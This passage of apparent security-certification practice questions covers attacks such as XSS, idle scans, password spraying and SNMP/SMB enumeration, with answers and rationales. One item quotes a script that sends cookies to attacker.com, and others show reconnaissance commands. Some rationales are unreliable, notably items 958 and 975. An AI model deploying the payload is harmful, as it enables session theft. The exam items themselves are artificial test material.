C.Brute-force attack
D.SQL injection
E.Password spraying
AnswersB, C, E

Valid usernames can be used with breached password lists.

Why this answer

With username enumeration and no rate limiting, brute force (trying many passwords on one user), credential stuffing (using breached credentials), and password spraying (trying common passwords across many users) are all viable. SQL injection is not directly related to the described conditions.

940
MCQmedium

Which tool is commonly used to perform DNS spoofing on a local network by intercepting DNS requests and replying with forged responses?

A.Ettercap
B.Wireshark
C.Nmap
D.tcpdump
AnswerA

Ettercap includes DNS spoofing functionality.

Why this answer

Ettercap has a DNS spoofing plugin that can redirect DNS queries to malicious IPs. Other tools like dnsspoof also exist, but Ettercap is a common multipurpose MITM tool.

941
MCQhard

An attacker uses `nmap -sI 10.0.0.5 192.168.1.10` to scan a target. This technique is known as an idle scan. Which condition is REQUIRED for this scan to work correctly?

A.The zombie host must be running a Windows operating system
B.The attacker must have root access on the target machine
C.The zombie host must have an incremental IP ID sequence that is not reset by other traffic
D.The target must be running a Linux server with SSH enabled
AnswerC

The idle scan relies on observing changes in the zombie's IP ID to infer port status. If the zombie receives other traffic, the IP ID may increment, causing false results.

Why this answer

The idle scan (nmap -sI) relies on the zombie host's IP ID sequence being predictable and incremental. The attacker probes the zombie's IP ID, sends a spoofed SYN packet to the target (appearing from the zombie), and then re-checks the zombie's IP ID. If the IP ID has increased by exactly 2 (or more if other traffic occurred), the target responded to the zombie, confirming the port is open.

The zombie must not reset or randomize its IP ID, and other traffic to the zombie must be minimal or accounted for, making an incremental IP ID sequence the essential condition.

Exam trap

EC-Council often tests the misconception that the zombie must be idle or that the target must have a specific service, but the core requirement is the zombie's IP ID sequence being incremental and not reset by other traffic.

How to eliminate wrong answers

Option A is wrong because the idle scan does not require any specific operating system on the zombie; it works with any host that uses an incremental IP ID sequence (e.g., many legacy Windows, Linux, or BSD systems). Option B is wrong because the attacker does not need root access on the target machine; the scan is performed externally, and root access is only needed on the attacker's machine to send raw packets (e.g., via libpcap). Option D is wrong because the target's operating system or SSH service is irrelevant; the idle scan works against any TCP port on any target, regardless of OS or running services.

942
MCQeasy

You are a security consultant for a mid-sized company with 500 employees. The company has a secure data center with a biometric access control system. Recently, a contractor was able to enter the data center without authorization by claiming he forgot his badge and an employee held the door for him. The contractor then accessed sensitive servers and exfiltrated data. The company wants to prevent such incidents. Which physical security control would be most effective in preventing this type of attack?

A.Install CCTV cameras to monitor the entrance.
B.Require employees to wear RFID badges at all times.
C.Implement a mantrap with biometric and badge authentication.
D.Hire additional security guards at the entrance.
AnswerC

Mantraps physically prevent tailgating by requiring one person at a time.

Why this answer

Option C is correct because a mantrap with biometric and badge authentication enforces strict two-person authentication: both the contractor and the employee must independently authenticate before the mantrap doors unlock. This prevents tailgating (piggybacking) by ensuring only one person enters per authentication cycle, eliminating the social engineering vector where an employee holds the door for an unauthorized individual.

Exam trap

The trap here is that candidates often choose CCTV or guards because they seem like obvious physical security measures, but the question specifically targets tailgating/piggybacking, which only a mantrap with dual authentication can reliably prevent.

How to eliminate wrong answers

Option A is wrong because CCTV cameras are passive monitoring tools; they do not prevent unauthorized entry, only record it after the fact, and cannot stop tailgating in real time. Option B is wrong because requiring RFID badges at all times does not prevent an employee from holding the door for an unauthorized person; badges alone cannot enforce one-person-per-entry. Option D is wrong because additional security guards can still be socially engineered or fail to notice tailgating, and guards introduce human error and cost without the deterministic access control of a mantrap.

943
MCQhard

After a security incident, logs show repeated login attempts from different IP addresses using a list of common passwords against a single username. Which attack technique is being used?

A.Credential stuffing
B.Brute force attack
C.Password spraying
D.Dictionary attack
AnswerC

Password spraying uses a few common passwords against many accounts or single account from many IPs.

Why this answer

Password spraying uses a small set of common passwords against many accounts or, as in this case, against a single account from multiple IPs to avoid lockout.

944
MCQhard

Refer to the exhibit. During a wireless audit, you capture a beacon frame from a corporate access point. What is the most significant security concern based on this information?

A.The pairwise cipher is CCMP, which is outdated.
B.The network uses WPA2-PSK, which is easily cracked.
C.The beacon frame reveals the BSSID, which is a security risk.
D.The group cipher is TKIP, which is deprecated and vulnerable.
AnswerD

TKIP should not be used.

Why this answer

Option D is correct because TKIP (Temporal Key Integrity Protocol) is a deprecated encryption protocol that was part of the original WPA standard. It is vulnerable to several attacks, including the Michael attack and the Beck-Tews attack, which can allow an attacker to decrypt traffic or inject packets. In a modern WPA2 network, TKIP should never be used as the group cipher; only CCMP (AES) is considered secure.

Exam trap

The trap here is that candidates often assume WPA2-PSK is inherently insecure (Option B) or that revealing the BSSID is a risk (Option C), but the real security flaw in this scenario is the use of TKIP as the group cipher, which is deprecated and known to be broken.

How to eliminate wrong answers

Option A is wrong because CCMP (Counter Mode Cipher Block Chaining Message Authentication Code Protocol) is the most secure cipher available for WPA2, based on AES, and is not outdated. Option B is wrong because while WPA2-PSK can be cracked if a weak passphrase is used, the protocol itself is not 'easily cracked' — the vulnerability lies in the passphrase strength, not the protocol. Option C is wrong because the BSSID (Basic Service Set Identifier) is the MAC address of the access point and is always transmitted in beacon frames; revealing it is not a security risk as it is necessary for client devices to identify and connect to the network.

945
MCQmedium

A security analyst notices that after submitting a form on a web application, the URL changes to include the user's ID parameter, e.g., 'user?id=123'. The analyst modifies the ID in the URL and accesses another user's profile without authorization. Which type of vulnerability is being exploited?

A.Reflected Cross-Site Scripting (XSS)
B.Command Injection
C.Cross-Site Request Forgery (CSRF)
D.Insecure Direct Object Reference (IDOR)
AnswerD

IDOR occurs when an application exposes references (e.g., user ID) and fails to verify authorization, allowing attackers to access other objects.

Why this answer

This is an Insecure Direct Object Reference (IDOR) vulnerability, where the application exposes internal object references (like user IDs) without proper access control checks.

946
MCQmedium

A security analyst runs the command: nbtstat -A 192.168.1.10. The output shows the table of names for the remote machine. Which of the following is the MOST likely purpose of this command?

A.To perform a DNS zone transfer
B.To enumerate SNMP community strings on the remote host
C.To enumerate NetBIOS names and services on the remote host
D.To enumerate SMB shares on the remote host
AnswerC

nbtstat -A queries the NetBIOS name table of a remote machine.

Why this answer

nbtstat -A (with capital A) performs a NetBIOS name table lookup on a remote IP address, revealing computer names, logged-in users, and services.

947
MCQhard

During a vulnerability scan with Nessus, you find that port 445/TCP is open on a Windows server. Which of the following is the MOST likely associated risk?

A.SNMP community string brute-forcing
B.Remote code execution via SMB vulnerabilities
C.HTTP directory traversal
D.DNS cache poisoning
AnswerB

SMB on port 445 has known RCE vulnerabilities.

Why this answer

Port 445/TCP is used by Microsoft SMB (Server Message Block) over a direct TCP connection, commonly known as SMB over TCP. SMB has historically been plagued by critical remote code execution vulnerabilities, most notably EternalBlue (MS17-010) exploited by WannaCry. Therefore, an open SMB port on a Windows server presents a high risk of remote code execution if unpatched.

Exam trap

The trap here is that candidates may associate port 445 with file sharing only and overlook its history of critical remote code execution vulnerabilities, instead choosing a more generic or unrelated attack vector like HTTP directory traversal.

How to eliminate wrong answers

Option A is wrong because SNMP community string brute-forcing targets UDP ports 161/162, not TCP port 445. Option C is wrong because HTTP directory traversal exploits web servers on ports 80/443/TCP, not the SMB port. Option D is wrong because DNS cache poisoning attacks target DNS servers on UDP/TCP port 53, not port 445.

948
MCQmedium

A security analyst reviews the following command output from a Linux system: `uid=0(root) gid=0(root) groups=0(root)`. The analyst suspects a privilege escalation attack. Which of the following techniques could have been used to achieve root access from a standard user account?

A.Token impersonation
B.Pass-the-hash attack
C.LLMNR/NBT-NS poisoning
D.SUID/GUID abuse
AnswerD

Exploiting a SUID binary can elevate privileges to root.

Why this answer

The command output shows the current user has UID 0, which is the root user. On Linux, SUID (Set User ID) and GUID (Group ID) bits allow executables to run with the permissions of the file owner (e.g., root). A standard user can exploit a misconfigured SUID binary (like `passwd` or a custom script) to execute commands with root privileges, achieving privilege escalation.

This is a classic Linux privilege escalation technique directly tied to the UID/GID output shown.

Exam trap

The trap here is that candidates confuse Windows-specific attacks (token impersonation, pass-the-hash, LLMNR poisoning) with Linux privilege escalation, failing to recognize that the `uid=0` output is a direct indicator of root access achieved via SUID/GUID abuse.

How to eliminate wrong answers

Option A is wrong because token impersonation is a Windows-specific attack that involves duplicating access tokens (e.g., via SeImpersonatePrivilege) and does not apply to Linux systems. Option B is wrong because pass-the-hash is a Windows network authentication attack that reuses NTLM hashes to authenticate without knowing the plaintext password; it is not relevant to Linux local privilege escalation. Option C is wrong because LLMNR/NBT-NS poisoning is a Windows network protocol attack used to intercept authentication requests on a local network, not a technique to escalate privileges on a local Linux system.

949
MCQmedium

A security analyst observes that a web application allows users to submit feedback, and after submission, the feedback is displayed on a public page. An attacker submits feedback containing the script: <script>document.location='http://attacker.com/?c='+document.cookie</script>. When an admin views the public page, the script executes. Which type of attack occurred?

A.Reflected XSS
B.Cross-site request forgery (CSRF)
C.DOM-based XSS
D.Stored XSS
AnswerD

The malicious script is stored in the feedback database and executed when the admin retrieves it.

Why this answer

The script is stored on the server (feedback) and executed when the admin views the page. This is persistent (stored) XSS.

950
MCQeasy

Which of the following is a primary purpose of the enumeration phase in a penetration test?

A.To gather in-depth information about the target system and its resources
B.To exploit identified vulnerabilities and gain access
C.To perform a vulnerability scan on the target network
D.To delete logs and cover tracks after a successful compromise
AnswerA

Enumeration focuses on extracting information like usernames, shares, services, and other details that can be used for exploitation.

Why this answer

Enumeration is the process of extracting detailed information about a target, such as user accounts, network shares, and services, which is used to identify potential attack vectors.

951
MCQeasy

Refer to the exhibit. An attacker runs the nslookup command shown. What information has been gathered?

A.Mail server addresses and priority
B.Name server records
C.IP addresses of the web server
D.SPF records for email authentication
AnswerA

MX records show mail servers and their priority.

Why this answer

The nslookup command with the -type=MX query returns mail exchange (MX) records for the domain. The output shows mail server hostnames and their associated priority values (e.g., 10, 20), which indicate the order in which mail servers should be used. This directly reveals the mail server addresses and their priority, making option A correct.

Exam trap

The trap here is that candidates confuse DNS record types—specifically, they may think MX records return IP addresses or SPF data, when in fact MX only returns mail server hostnames and priorities.

How to eliminate wrong answers

Option B is wrong because name server (NS) records are retrieved using -type=NS, not -type=MX; the output shows no NS records. Option C is wrong because IP addresses of the web server are obtained via A or AAAA records, not MX records; MX records only provide mail server hostnames, not web server IPs. Option D is wrong because SPF records are stored as TXT records, not MX records; the -type=MX query does not return SPF data.

952
MCQhard

A security engineer observes the following log event: 'Certificate for www.example.com was issued by an intermediate CA that chains to a root CA not in the trusted store.' Which type of attack might this indicate?

A.Birthday attack on the certificate signature
B.Downgrade attack to SSLv3
C.Man-in-the-middle using a rogue certificate
D.Replay attack on the TLS handshake
AnswerC

An untrusted root CA indicates the certificate is not validated, which could be from an attacker's proxy issuing its own cert.

Why this answer

A certificate from an untrusted root CA suggests a rogue or misissued certificate, possibly from a malicious CA or a man-in-the-middle attack using a proxy with its own CA certificate not trusted by the client.

953
MCQmedium

A penetration tester is performing SNMP enumeration against a network device and wants to retrieve the entire Management Information Base (MIB) tree. Which command should they use?

A.snmpwalk -v 2c -c public 192.168.1.1 .1
B.snmpset -v 2c -c private 192.168.1.1 1.3.6.1.2.1.1.0 s 'test'
C.snmpbulkwalk -v 2c -c public 192.168.1.1 .1
D.snmpget -v 2c -c public 192.168.1.1 1.3.6.1.2.1.1
AnswerA

snmpwalk with .1 as the starting OID will walk the entire MIB tree, retrieving all values.

Why this answer

Option A is correct because `snmpwalk` is specifically designed to retrieve a subtree of MIB objects by performing a series of GETNEXT requests starting from a given OID. Using `.1` as the root OID (which corresponds to the entire ISO tree) with the SNMPv2c community string 'public' will enumerate all accessible OIDs in the MIB tree, effectively dumping the entire Management Information Base.

Exam trap

The trap here is that candidates often confuse `snmpbulkwalk` as the correct answer because it is faster for large MIBs, but the CEH exam expects `snmpwalk` as the standard enumeration tool, and `snmpbulkwalk` may not be supported by all SNMP agents.

How to eliminate wrong answers

Option B is wrong because `snmpset` is used to modify SNMP objects, not to retrieve them; it requires write access (community 'private') and would fail to enumerate the MIB tree. Option C is wrong because `snmpbulkwalk` is optimized for bulk retrieval but is not the standard command for a full MIB tree walk; it uses GETBULK requests which may be blocked or behave differently on some devices, and the question asks for the command to use, not the most efficient one. Option D is wrong because `snmpget` retrieves only a single OID value (1.3.6.1.2.1.1) and does not walk the tree; it would return only the system description or a single scalar object, not the entire MIB.

954
Multi-Selectmedium

Which TWO of the following are characteristics of a reflected Cross-Site Scripting (XSS) attack? (Select 2)

Select 2 answers
A.The attack is typically delivered through a crafted link
B.The script executes in the server-side context
C.The attack affects all users who visit the compromised page without any interaction
D.The malicious script is reflected off the web server in the response
E.The malicious script is permanently stored on the server
AnswersA, D

Reflected XSS often requires the victim to click a malicious link.

Why this answer

Reflected XSS requires user interaction (clicking a link) and does not persist on the server.

955
MCQhard

An analyst reviews a web server log and sees the following request: GET /search?q=<script>alert('xss')</script> HTTP/1.1. The response from the server includes the search term inside a <div> tag without any sanitization. Which type of XSS vulnerability does this indicate?

A.Stored XSS
B.Reflected XSS
C.DOM-based XSS
D.Blind XSS
AnswerB

The script is injected via a URL parameter and immediately reflected in the server's response, which is the definition of reflected XSS.

Why this answer

This is a typical reflected XSS because the malicious script is injected via a GET parameter and immediately reflected in the response without persistent storage.

956
MCQmedium

An attacker uses the Social Engineering Toolkit (SET) to clone a legitimate website and send a malicious link to employees. When an employee clicks the link, they are prompted to enter their credentials. Which attack is this?

A.SMiShing
B.Spear phishing
C.Vishing
D.Phishing
AnswerD

Phishing uses fake websites and emails to trick victims into revealing credentials.

Why this answer

Phishing involves sending fraudulent communications that appear to come from a reputable source, often via email, to steal credentials. SET is commonly used for phishing campaigns.

957
MCQmedium

During a security assessment, an analyst runs 'enum4linux -a 10.0.0.5' and obtains a list of users, shares, and OS information. What protocol is enum4linux primarily using to gather this information?

A.NetBIOS
B.SNMP
C.LDAP
D.SMB/CIFS
AnswerD

enum4linux leverages SMB/CIFS protocol to query Windows shares, users, and OS details.

Why this answer

enum4linux is a wrapper around tools from the Samba suite, primarily using the SMB/CIFS protocol to query Windows systems for information such as user lists, shares, and OS details. It leverages SMB's remote IPC mechanisms (e.g., via \pipe\lsarpc or \pipe\samr) to enumerate these data points, making D the correct answer.

Exam trap

The trap here is that candidates confuse the underlying protocol (SMB/CIFS) with the transport or name-resolution layer (NetBIOS), leading them to select Option A because enum4linux historically used NetBIOS name lookups, but the core enumeration protocol is SMB/CIFS.

How to eliminate wrong answers

Option A is wrong because NetBIOS is a session-layer protocol used for name resolution and service discovery, but enum4linux relies on SMB/CIFS over TCP/445 (or NetBIOS over TCP/139) to perform its enumeration; the tool itself is not primarily a NetBIOS scanner. Option B is wrong because SNMP (Simple Network Management Protocol) uses UDP ports 161/162 and is designed for managing network devices, not for enumerating Windows user accounts or shares via SMB. Option C is wrong because LDAP (Lightweight Directory Access Protocol) operates on TCP/389 and is used for querying directory services like Active Directory, but enum4linux does not use LDAP by default; it uses SMB RPC calls to extract information.

958
MCQhard

An analyst observes the following output from Wireshark: a TCP packet with the SYN flag set, followed by a SYN-ACK, then an ACK, and then a RST. The sequence numbers show a pattern: initial seq=100, ack=300, then seq=300, ack=101. What is the MOST likely interpretation?

A.An attacker is performing TCP sequence prediction to hijack the session.
B.A normal TCP connection establishment followed by an immediate termination.
C.A man-in-the-middle attack using ARP spoofing.
D.A TCP SYN flood attack is in progress.
AnswerA

Correct. The sequence numbers show successful prediction, and the RST may be used to reset the connection after hijacking.

Why this answer

The sequence numbers (100, 300) suggest the attacker correctly guessed the TCP sequence numbers to spoof a connection. The three-way handshake completes (SYN, SYN-ACK, ACK), then the attacker sends a RST to close. This is indicative of TCP sequence prediction attack (session hijacking attempt).

959
MCQmedium

A penetration tester wants to identify live hosts on a large IP range without generating excessive network traffic. Which tool is BEST suited for fast host discovery?

A.Masscan
B.Maltego
C.dnsenum
D.Nessus
AnswerA

Masscan is designed for high-speed scanning of large address spaces.

Why this answer

Masscan is the best tool for fast host discovery across large IP ranges because it uses asynchronous transmission and can scan the entire IPv4 address space in under 10 minutes at a rate of 10 million packets per second. It minimizes network traffic by sending only SYN packets and not completing the TCP handshake, making it ideal for rapid live host detection without overwhelming the network.

Exam trap

The trap here is that candidates confuse 'host discovery' with 'vulnerability scanning' or 'OSINT gathering', leading them to choose Nessus or Maltego, but the question specifically asks for minimal traffic and speed, which only Masscan's asynchronous SYN scan achieves.

How to eliminate wrong answers

Option B is wrong because Maltego is a graphical link analysis tool for gathering and correlating open-source intelligence (OSINT), not a network scanner for live host discovery; it relies on existing data sources rather than sending packets. Option C is wrong because dnsenum is a DNS enumeration tool that queries DNS servers for subdomains and records, not a host discovery scanner; it does not send raw packets to probe IP addresses. Option D is wrong because Nessus is a comprehensive vulnerability scanner that performs deep, multi-packet scans with full handshakes and plugin checks, generating heavy traffic and taking much longer than needed for simple host discovery.

960
MCQmedium

A company wants to protect its network from MAC flooding attacks. Which of the following countermeasures is MOST effective?

A.Use Wireshark to monitor for floods
B.Disable CAM table learning
C.Enable port security on switches
D.Implement ARP spoofing detection
AnswerC

Correct. Port security restricts the number of MAC addresses per switch port.

Why this answer

MAC flooding tries to overflow the switch's MAC address table, causing it to act like a hub. Port security limits the number of MAC addresses per port, preventing flooding.

961
MCQmedium

During a penetration test, an analyst runs the command 'snmpwalk -v2c -c public 192.168.1.10' and receives a large amount of output. Which protocol and community string are being used?

A.SNMPv1 with community string public
B.SNMPv1 with community string private
C.SNMPv2c with community string public
D.SNMPv3 with user public
AnswerC

The flags -v2c and -c public correctly identify SNMP version 2c and community string public.

Why this answer

The command 'snmpwalk -v2c -c public 192.168.1.10' explicitly specifies SNMP version 2c with the '-v2c' flag and the community string 'public' with the '-c' flag. SNMPv2c is the most common version for read-only queries, and 'public' is the default read-only community string. The large output indicates successful enumeration of the MIB tree, confirming the community string is correct.

Exam trap

The trap here is that candidates often confuse the '-v2c' flag with SNMPv1 or assume 'public' is always read-only, but the question tests the direct mapping of command-line arguments to protocol version and community string.

How to eliminate wrong answers

Option A is wrong because the command uses '-v2c', not '-v1', so SNMPv1 is not being used. Option B is wrong because it incorrectly specifies SNMPv1 and the community string 'private', which is typically used for read-write access, not the 'public' string shown in the command. Option D is wrong because SNMPv3 does not use community strings; it uses usernames and authentication/encryption parameters, and the command does not include any SNMPv3-specific flags like '-u' or '-l'.

962
MCQhard

During a forensic investigation, an analyst finds a suspicious file that changes its code signature each time it replicates. The file uses encryption and polymorphism to evade signature-based detection. Which type of virus is this?

A.Macro virus
B.File infector virus
C.Boot sector virus
D.Polymorphic virus
AnswerD

Polymorphic viruses change their code signature using encryption and mutation engines.

Why this answer

A polymorphic virus mutates its code (often using encryption) while preserving its functionality, producing different signatures with each infection.

963
MCQmedium

A security analyst runs `nmap -sS -sV -A 192.168.1.100` and obtains open ports and service versions. However, the analyst suspects the target is behind an IDS/IPS. Which Nmap technique would BEST evade detection while still performing a similar scan?

A.Add -f to fragment IP packets
B.Use -sT instead of -sS to perform a full TCP connect scan
C.Increase timing to -T5 for a faster scan
D.Replace -sV with -sU to scan UDP services
AnswerA

Fragmentation can evade simple packet inspection by IDS/IPS.

Why this answer

Option A is correct because using the `-f` flag fragments the IP packets, splitting the TCP header across multiple packets. This helps evade simple IDS/IPS signatures that rely on detecting a complete SYN scan in a single packet, as the fragmented packets may bypass pattern-matching rules or reassembly buffers.

Exam trap

EC-Council often tests the misconception that faster scans (`-T5`) are stealthier, when in reality they increase noise and detection risk, while fragmentation (`-f`) is a recognized evasion technique for bypassing packet inspection.

How to eliminate wrong answers

Option B is wrong because `-sT` performs a full TCP connect scan, which completes the three-way handshake and is more likely to be logged by the target system and detected by IDS/IPS due to the completed connections. Option C is wrong because increasing timing to `-T5` sends packets faster, which can actually increase the likelihood of detection by IDS/IPS due to abnormal traffic patterns or rate-based alerts. Option D is wrong because replacing `-sV` with `-sU` changes the scan type to UDP, which does not perform the same service version detection and is not a technique for evading detection; it simply scans different protocols.

964
Multi-Selectmedium

Which TWO of the following are characteristics of a DNS amplification attack? (Select 2)

Select 2 answers
A.It targets the victim's MAC address
B.It uses spoofed source IP addresses
C.It exploits open DNS resolvers
D.It requires the attacker to be on the same subnet as the victim
E.It uses ICMP echo requests
AnswersB, C

Spoofed IPs direct responses to the victim.

Why this answer

DNS amplification uses open resolvers and spoofed source IPs to send small queries that yield large responses, amplifying traffic.

965
MCQeasy

Which type of malware is characterized by self-replication and spreading across networks without needing a host file?

A.Trojan
B.Worm
C.Ransomware
D.Virus
AnswerB

Correct. Worms are self-replicating and spread without a host.

Why this answer

Worms are standalone programs that replicate and spread independently, often exploiting network vulnerabilities.

966
MCQeasy

An attacker attempts to exploit a web application by sending a request that triggers the server to make an internal HTTP request to a sensitive internal service. Which type of attack is this?

A.CSRF
B.XXE
C.SSRF
D.IDOR
AnswerC

SSRF involves the server making unintended requests to internal or external systems.

Why this answer

SSRF (Server-Side Request Forgery) occurs when an attacker can induce the server to make requests to internal resources.

967
MCQmedium

During a reconnaissance phase, a penetration tester uses Shodan to search for devices with a specific open port. Which of the following BEST describes what Shodan provides beyond a simple port scan?

A.Real-time network traffic analysis
B.Passive DNS records and domain registration details
C.Banner information and service metadata from internet-connected devices
D.Historical vulnerability data for each device
AnswerC

Shodan's main feature is gathering banner information and metadata from scanned services.

Why this answer

Shodan is a search engine for internet-connected devices that actively probes IP addresses and collects banner information—the metadata that services (e.g., HTTP, SSH, FTP) return upon connection. This includes server headers, version strings, default credentials, and other service fingerprints, which goes far beyond a simple port scan that only reports whether a port is open or closed.

Exam trap

The trap here is that candidates confuse Shodan's banner-grabbing capability with a vulnerability scanner, assuming it provides historical CVE data, when in fact Shodan only shows the current service fingerprint and does not automatically map it to vulnerabilities.

How to eliminate wrong answers

Option A is wrong because Shodan does not perform real-time network traffic analysis; it uses periodic, active probing to collect static snapshots of service banners, not live packet captures or flow data. Option B is wrong because passive DNS records and domain registration details are the domain of tools like whois, SecurityTrails, or DNSdumpster, not Shodan—Shodan focuses on IP-level service metadata, not domain-level ownership or DNS history. Option D is wrong because Shodan does not provide historical vulnerability data for each device; while it may show the version of a service, it does not correlate that version with CVE databases or track patch history—that would require a separate vulnerability scanner or a platform like Shodan's own 'Vulnerabilities' feature (which is an add-on, not a core capability).

968
Multi-Selectmedium

Which TWO of the following tools are capable of cracking password hashes offline? (Select 2)

Select 2 answers
A.Hashcat
B.Hydra
C.John the Ripper
D.Nmap
E.Wireshark
AnswersA, C

Hashcat is a powerful offline password cracker supporting GPU acceleration.

Why this answer

John the Ripper and Hashcat are both offline password crackers. Hydra is for online attacks. Wireshark is a packet analyzer.

Nmap is a network scanner.

969
Multi-Selectmedium

Which THREE of the following are common indicators of a buffer overflow vulnerability?

Select 3 answers
A.Unexpected program crashes or segmentation faults
B.Access violation errors when writing to memory
C.Use of return-oriented programming (ROP)
D.High CPU usage
E.Overwritten adjacent memory regions
AnswersA, B, E

Crashes often occur when memory is corrupted.

Why this answer

A is correct because buffer overflow vulnerabilities often cause unexpected program crashes or segmentation faults. When a program writes data beyond the allocated buffer size, it can corrupt the stack or heap, leading to invalid memory access that the operating system detects and terminates with a segmentation fault (SIGSEGV). This is a classic symptom of overwritten return addresses or other critical control data.

Exam trap

The trap here is that candidates confuse exploitation techniques (like ROP) with vulnerability indicators, but ROP is a post-exploitation method, not a sign that a buffer overflow exists.

970
Multi-Selectmedium

Which THREE of the following are common techniques used during the footprinting phase? (Choose three.)

Select 3 answers
A.Exploitation
B.Port scanning
C.WHOIS lookup
D.Google hacking
E.DNS zone transfer
AnswersC, D, E

WHOIS provides domain registration details.

Why this answer

WHOIS lookup is a footprinting technique that queries domain registration databases (e.g., whois.arin.net) to obtain registrant contact details, name servers, and registration dates. This information is publicly available and helps attackers map an organization's digital footprint without direct interaction with the target.

Exam trap

EC-Council often tests the distinction between footprinting (passive, non-intrusive) and scanning (active, intrusive), so candidates mistakenly classify port scanning or exploitation as footprinting techniques.

971
MCQeasy

A security analyst wants to discover all DNS records associated with a domain without triggering a full zone transfer. Which tool is BEST suited for this task?

A.theHarvester
B.dig
C.nslookup
D.dnsrecon
AnswerD

dnsrecon is a powerful DNS enumeration script that can query multiple record types and perform subdomain brute-forcing.

Why this answer

D (dnsrecon) is correct because it is a dedicated DNS enumeration tool that performs multiple types of DNS record queries (A, AAAA, CNAME, MX, NS, SOA, SRV, TXT, etc.) using techniques like brute‑forcing subdomains and performing SRV record enumeration, all without attempting a full zone transfer (AXFR). It is specifically designed for reconnaissance and can discover hidden or non‑obvious DNS records efficiently.

Exam trap

EC-Council often tests the misconception that nslookup or dig are sufficient for comprehensive DNS discovery, but the question specifically asks for a tool that discovers *all* DNS records without a zone transfer, which requires automated enumeration beyond single‑query tools.

How to eliminate wrong answers

Option A (theHarvester) is wrong because it is primarily an email, subdomain, and open‑source intelligence (OSINT) gathering tool that uses search engines and public sources, not direct DNS queries for all record types. Option B (dig) is wrong because while it can query individual DNS record types, it is a manual command‑line tool that requires separate queries for each record type and does not automate the discovery of all DNS records in a single pass. Option C (nslookup) is wrong because it is an older, interactive DNS lookup utility that also requires manual, per‑record queries and lacks the automated enumeration features of dnsrecon.

972
MCQeasy

Which of the following tools is specifically used to enumerate SMB shares and retrieve file listings from Windows systems?

A.ldapsearch
B.snmpwalk
C.smbclient
D.nmap
AnswerC

smbclient -L lists shares and can connect to them to browse files.

Why this answer

smbclient is a tool from the Samba suite specifically designed to interact with SMB/CIFS shares. It allows an attacker to enumerate available shares on a Windows target and retrieve file listings by connecting to the SMB service (port 445 or 139) using commands like 'smbclient -L //target' or by mounting a share and listing its contents.

Exam trap

The trap here is that candidates often confuse nmap's ability to detect SMB services with the actual enumeration of shares and file listings, but nmap requires specific NSE scripts and does not provide the direct interactive file listing capability that smbclient offers.

How to eliminate wrong answers

Option A is wrong because ldapsearch is a tool for querying LDAP directory services (port 389/636), not for enumerating SMB shares or retrieving file listings from Windows systems. Option B is wrong because snmpwalk is used to retrieve SNMP MIB data (port 161/162) from network devices, not to interact with SMB shares. Option D is wrong because nmap is a port scanner and network mapper that can detect open SMB ports but cannot natively enumerate SMB shares or retrieve file listings without additional scripts (e.g., smb-enum-shares), and even then it is not the dedicated tool for direct file listing.

973
MCQhard

A security team suspects a session hijacking attack. The analyst examines network traffic and sees packets with sequence numbers that increment by predictable values. Which attack is MOST likely occurring?

A.TCP sequence prediction
B.ARP poisoning
C.DNS spoofing
D.MAC flooding
AnswerA

Predictable sequence numbers allow packet injection.

Why this answer

TCP session hijacking relies on predicting sequence numbers to inject packets.

974
MCQmedium

During a social engineering assessment, an attacker calls a help desk impersonating a new employee and requests a password reset due to a 'locked account'. The help desk complies. Which social engineering technique is being used?

A.Phishing
B.Vishing
C.Pretexting
D.Quid pro quo
AnswerC

Pretexting involves creating a false identity or scenario to trick the target.

Why this answer

Pretexting involves creating a fabricated scenario (pretext) to obtain information or action.

975
MCQmedium

A security analyst receives an alert indicating that a host on the internal network is sending a high volume of ICMP echo requests to multiple external IP addresses. The analyst notices that the source IP address is spoofed. Which type of attack is MOST likely occurring?

A.Fraggle attack
B.ICMP flood
C.Smurf attack
D.Ping flood
AnswerC

The Smurf attack sends spoofed ICMP echo requests to a network broadcast address, causing all hosts to reply to the victim. This fits the description.

Why this answer

A Smurf attack uses spoofed ICMP echo requests sent to a broadcast address, causing all hosts on the network to reply to the victim. However, the scenario describes sending to multiple external IPs, which is more characteristic of a DDoS amplification attack using ICMP. But given the options, Smurf is the closest match because it involves ICMP and spoofed source.

Ping flood is a simpler flood without spoofing necessarily, and Fraggle uses UDP. Therefore, Smurf is correct.

Page 12

Page 13 of 14

Page 14